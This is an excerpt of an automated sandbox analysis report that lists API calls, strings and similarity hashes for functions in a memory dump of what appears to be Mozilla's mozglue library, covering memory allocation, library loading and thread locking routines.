Part of subcall function 6C64F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C64F132

CloseHandle.KERNEL32(00000000), ref: 6C67F555

Part of subcall function 6C6514B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C651248,6C651248,?), ref: 6C6514C9
Part of subcall function 6C6514B0: memcpy.VCRUNTIME140(?,6C651248,00000000,?,6C651248,?), ref: 6C6514EF

Part of subcall function 6C64EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C64EEE3

CreateFileW.KERNEL32 ref: 6C67F4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C67F523

Strings

\oleacc.dll, xrefs: 6C67F4CB

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: ddce93b9264b4fbb287f4583127fce5236b628863b90e9a1ba284f7086a6e13d
Instruction ID: 0def9dc79f91c378d27a9aaf4aa499380300fb2c55acd4eb46cf8009492b122d
Opcode Fuzzy Hash: ddce93b9264b4fbb287f4583127fce5236b628863b90e9a1ba284f7086a6e13d
Instruction Fuzzy Hash: 0741CF706087109FE720DF29C884AAAB3F4AF99318F504E1CF59183650EB30D959CBAB

Function 6C6A74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C6A7526
__Init_thread_footer.LIBCMT ref: 6C6A7566
__Init_thread_footer.LIBCMT ref: 6C6A7597

Strings

kernel32.dll, xrefs: 6C6A7557
UnmapViewOfFile2, xrefs: 6C6A7552

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: a381560c0824dcf6d9ddee4cd9ce7c3ac60612f6fe926cbc95f31da23fd7455d
Instruction ID: da2043aa7880c35334c40665f76cd53d1a2a46af0230fae046415cf1e5f98cad
Opcode Fuzzy Hash: a381560c0824dcf6d9ddee4cd9ce7c3ac60612f6fe926cbc95f31da23fd7455d
Instruction Fuzzy Hash: 0421C231701501EBDB149FEAE898E993375EB87769F044529E80587B40CB21BD278ABF

Function 6C6AC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6AC0E9), ref: 6C6AC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C6AC437
FreeLibrary.KERNEL32(?,6C6AC0E9), ref: 6C6AC44C

Strings

ntdll.dll, xrefs: 6C6AC413
NtQueryVirtualMemory, xrefs: 6C6AC431

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: e87bc26c92d936e75d7de17913444ff8601cd550b1ca1dd327acfd9509f7a1a4
Instruction ID: 52639cc6ef0e53062872e49ebd7faad3218d2b02f1b36b0e212af4fb0c4e6a6e
Opcode Fuzzy Hash: e87bc26c92d936e75d7de17913444ff8601cd550b1ca1dd327acfd9509f7a1a4
Instruction Fuzzy Hash: FEE09274706309ABDB007B7389C87117AF8AB4AB44F004116BA05D2611EBB1CA028B5E

Function 6C6A75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6A748B,?), ref: 6C6A75B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C6A75D7
FreeLibrary.KERNEL32(?,6C6A748B,?), ref: 6C6A75EC

Strings

ntdll.dll, xrefs: 6C6A75B3
RtlNtStatusToDosError, xrefs: 6C6A75D1

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 9363a76ca3714901923874a8910b5c8d370a8254720639781625d2b72937ea95
Instruction ID: 2185c56fede4c406ee47fb592cc06f74df3b50f336df7ca6fade31c0b27d55b2
Opcode Fuzzy Hash: 9363a76ca3714901923874a8910b5c8d370a8254720639781625d2b72937ea95
Instruction Fuzzy Hash: E2E09A71640305ABDB005BA3D8C87117AF8EB4B754F104025AA05D3610DBB0C65A8F2E

Function 6C6A7600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6A7592), ref: 6C6A7608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C6A7627
FreeLibrary.KERNEL32(?,6C6A7592), ref: 6C6A763C

Strings

ntdll.dll, xrefs: 6C6A7603
NtUnmapViewOfSection, xrefs: 6C6A7621

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: 24fa96b6a49ca9c3b78c8e8183efb78a6b40de84a2256194346b028e3ac130e5
Instruction ID: c79796aa618ab31fcb6027bd5e4e16325d1ae8cf0a37050dca4e63a9ca41dcf7
Opcode Fuzzy Hash: 24fa96b6a49ca9c3b78c8e8183efb78a6b40de84a2256194346b028e3ac130e5
Instruction Fuzzy Hash: AEE0B6B1700705ABDF006FA7E98C7117AB8E75A799F005115EA05D2710EBB186268F6E

Function 6C6ABE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6C6ABE49), ref: 6C6ABEC4
RtlCaptureStackBackTrace.NTDLL ref: 6C6ABEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C6ABE49), ref: 6C6ABF38
RtlReAllocateHeap.NTDLL ref: 6C6ABF83
RtlFreeHeap.NTDLL(6C6ABE49,00000000), ref: 6C6ABFA6

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: ed7c47604f2fc056875e2f705f27f144e9a29d0fc81aa40bff331b7a4fef8620
Instruction ID: 005321908883943319413bc450e747820f5b49b402ab92a5726651d7e8b78255
Opcode Fuzzy Hash: ed7c47604f2fc056875e2f705f27f144e9a29d0fc81aa40bff331b7a4fef8620
Instruction Fuzzy Hash: 1F516E71A002098FE714CFA9C980BAAB7A6FFC9314F294639D516A7B55D730FD078B84

Function 6C698E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C68B58D,?,?,?,?,?,?,?,6C6BD734,?,?,?,6C6BD734), ref: 6C698E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C68B58D,?,?,?,?,?,?,?,6C6BD734,?,?,?,6C6BD734), ref: 6C698EBF
free.MOZGLUE(?,?,?,?,6C68B58D,?,?,?,?,?,?,?,6C6BD734,?,?,?), ref: 6C698F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C68B58D,?,?,?,?,?,?,?,6C6BD734,?,?,?,6C6BD734), ref: 6C698F46
free.MOZGLUE(?,?,?,?,6C68B58D,?,?,?,?,?,?,?,6C6BD734,?,?,?), ref: 6C698F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C68B58D,?,?,?,?,?,?,?,6C6BD734,?,?,?), ref: 6C698F8F

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 15cd8c31f0ea17342b64b4a38b96420315f9e539c404e9ae0334336a500ca384
Instruction ID: 3f104ecd53ed691b9492ea47b645119ea402bda0c0d04a287cca4ef93b79cd55
Opcode Fuzzy Hash: 15cd8c31f0ea17342b64b4a38b96420315f9e539c404e9ae0334336a500ca384
Instruction Fuzzy Hash: F05194B1A012168FEB14CF64D8807AE73B2FF49358F15052AD517ABB50E731F905CB99

Function 6C644DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C644E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C644E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C644EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C644F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C644F1E

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: 553ce657732e658ed606d64e61ea87e4033e1f5eb944cb7165f6311bc76eefba
Instruction ID: b043803a12b352ae0a392f2186130193cfcb79a322855be0923d35e95a420c8b
Opcode Fuzzy Hash: 553ce657732e658ed606d64e61ea87e4033e1f5eb944cb7165f6311bc76eefba
Instruction Fuzzy Hash: FD41D0716047019FC701CF29C4819ABB7E4BF8A344F10CA1DF56697B41DBB0E959CB95

Function 6C651530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C65152B,?,?,?,?,6C651248,?), ref: 6C65159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C65152B,?,?,?,?,6C651248,?), ref: 6C6515BC
moz_xmalloc.MOZGLUE(-00000001,?,6C65152B,?,?,?,?,6C651248,?), ref: 6C6515E7
free.MOZGLUE(?,?,?,?,?,?,6C65152B,?,?,?,?,6C651248,?), ref: 6C651606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C65152B,?,?,?,?,6C651248,?), ref: 6C651637

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 6b55d7cc9ce68064ec80756bacd796077f02a416098e3f0274ffb9da18beeb9b
Instruction ID: 7d5cd19d8a2bfeddd399a993c68f4a6c0179230c3ac667fadd17085dfae20665
Opcode Fuzzy Hash: 6b55d7cc9ce68064ec80756bacd796077f02a416098e3f0274ffb9da18beeb9b
Instruction Fuzzy Hash: BF31FCB19001159BC7148E7CD8504AE77A9FF863747B40B2DE423DBBD4EB30D9258799

Function 6C6AAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C6BE330,?,6C66C059), ref: 6C6AAD9D

Part of subcall function 6C65CA10: malloc.MOZGLUE(?), ref: 6C65CA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C6BE330,?,6C66C059), ref: 6C6AADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C6BE330,?,6C66C059), ref: 6C6AAE01
GetLastError.KERNEL32(?,00000000,?,?,6C6BE330,?,6C66C059), ref: 6C6AAE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C6BE330,?,6C66C059), ref: 6C6AAE3D

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: 6282f49cb4ac3abcc86de78703b579f9ca15e0fba3cd175b2ed8f8d27d1c3619
Instruction ID: 414ab847774844d3f43e4b1c7811503422105b8371a0f1c7b8b0cb9cd7955ca5
Opcode Fuzzy Hash: 6282f49cb4ac3abcc86de78703b579f9ca15e0fba3cd175b2ed8f8d27d1c3619
Instruction Fuzzy Hash: C83152B1A002159FDB10DF798C44AABBBF8EF49614F15482EE84AE7701E734DD05CBA8

Function 6C6A5EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C6BDCA0,?,?,?,6C67E8B5,00000000), ref: 6C6A5F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C67E8B5,00000000), ref: 6C6A5F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C67E8B5,00000000), ref: 6C6A5F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C67E8B5,00000000), ref: 6C6A5F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C67E8B5,00000000), ref: 6C6A5FD6

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: 4f133807a54779b2aed5337365ef2244415eff52a1860eda0b5c4d3d1c41a905
Instruction ID: aa6eeaf847a1d779ae801737c54a6ea56284914233714456264da5d029af87b8
Opcode Fuzzy Hash: 4f133807a54779b2aed5337365ef2244415eff52a1860eda0b5c4d3d1c41a905
Instruction Fuzzy Hash: 0C31E734300A008FD714CF6AC8D8A6AB7F9BF89319FA48558E5568BB95C731ED42CF94

Function 6C64B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C64B532
moz_xmalloc.MOZGLUE(?), ref: 6C64B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C64B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C64B57E
free.MOZGLUE(00000000), ref: 6C64B58F

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 76dbf6d7503ea80cc4b9e8a684b1c6dfa79aacfe481d2b9e7ab22c59beb82d69
Instruction ID: 54abf74a1d393c1632ae9c603094a03bffdace506571857cee396edf958039b5
Opcode Fuzzy Hash: 76dbf6d7503ea80cc4b9e8a684b1c6dfa79aacfe481d2b9e7ab22c59beb82d69
Instruction Fuzzy Hash: E421EA71600605ABDB049F69CC80BAEFBB9FF86314F24C129E914DB341E775D921C7A5

Function 6C6A6E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C6A6E78

Part of subcall function 6C6A6A10: InitializeCriticalSection.KERNEL32(6C6CF618), ref: 6C6A6A68
Part of subcall function 6C6A6A10: GetCurrentProcess.KERNEL32 ref: 6C6A6A7D
Part of subcall function 6C6A6A10: GetCurrentProcess.KERNEL32 ref: 6C6A6AA1
Part of subcall function 6C6A6A10: EnterCriticalSection.KERNEL32(6C6CF618), ref: 6C6A6AAE
Part of subcall function 6C6A6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C6A6AE1
Part of subcall function 6C6A6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C6A6B15
Part of subcall function 6C6A6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C6A6B65
Part of subcall function 6C6A6A10: LeaveCriticalSection.KERNEL32(6C6CF618,?,?), ref: 6C6A6B83

MozFormatCodeAddress.MOZGLUE ref: 6C6A6EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C6A6EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C6A6EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C6A6EFF

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: c9caef209843c65dcdb94c51dc92a01e19e47b48a4a226dfe02895150a7b8adc
Instruction ID: edd3fea47998c8d4497ac40e19a8035e1afc0f92494a08480f32a8ef2fa76cae
Opcode Fuzzy Hash: c9caef209843c65dcdb94c51dc92a01e19e47b48a4a226dfe02895150a7b8adc
Instruction Fuzzy Hash: CE21B271A042599FCB00CF69D8C569E77F5EF88308F044039E81997341DB309A598F96

Function 6C680D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C643DEF), ref: 6C680D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C643DEF), ref: 6C680D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C643DEF), ref: 6C680DAF

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C680D97, 6C680DBE
<jemalloc>, xrefs: 6C680D92, 6C680DB9

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: ceb93d0b90620837ea908fd03643ef4a69f5b30902fd1aa3201f18bad21e1ff5
Instruction ID: fae5520eac6d893d3b90bbd7c95fba7eeb9903a80792819f9fa1f1477ed7d35f
Opcode Fuzzy Hash: ceb93d0b90620837ea908fd03643ef4a69f5b30902fd1aa3201f18bad21e1ff5
Instruction Fuzzy Hash: 66F089313C769423E62015665C0AB6A26ADABC2B65F344935F614DBDC0DA90E50086BF

Function 6C697620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C6975C4,?), ref: 6C69762B

Part of subcall function 6C65CA10: malloc.MOZGLUE(?), ref: 6C65CA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C6974D7,6C6A15FC,?,?,?), ref: 6C697644
GetCurrentThreadId.KERNEL32 ref: 6C69765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6974D7,6C6A15FC,?,?,?), ref: 6C697663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6974D7,6C6A15FC,?,?,?), ref: 6C697677

Memory Dump Source

Source File: 00000000.00000002.2308095573.000000006C641000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C640000, based on PE: true

Associated: 00000000.00000002.2308058750.000000006C640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308204883.000000006C6BD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308284101.000000006C6CE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2308318727.000000006C6D2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c640000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: b2d26d5e21e13e752e2f37b838c2c06fbdad15af35ea3c067402bff429de0885
Instruction ID: d56da3e8c4019730cf1c0bd7705c915c24be7e4169a8ef392eb4d044b2c278dc
Opcode Fuzzy Hash: b2d26d5e21e13e752e2f37b838c2c06fbdad15af35ea3c067402bff429de0885
Instruction Fuzzy Hash: DFF0C276E10785ABD7008F62C888676BB78FFEB799F214316F90543601E7B0A6D18BD4

Function 6C66D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C67CBE8: GetCurrentProcess.KERNEL32(?,6C6431A7), ref: 6C67CBF1
Part of subcall function 6C67CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6431A7), ref: 6C67CBFA

EnterCriticalSection.KERNEL32(6C6CE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C67D1C5), ref: 6C66D4F2
LeaveCriticalSection.KERNEL32(6C6CE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C67D1C5), ref: 6C66D50B

Part of subcall function 6C64CFE0: EnterCriticalSection.KERNEL32(6C6CE784), ref: 6C64CFF6
Part of subcall function 6C64CFE0: LeaveCriticalSection.KERNEL32(6C6CE784), ref: 6C64D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C67D1C5), ref: 6C66D52E
EnterCriticalSection.KERNEL32(6C6CE7DC), ref: 6C66D690
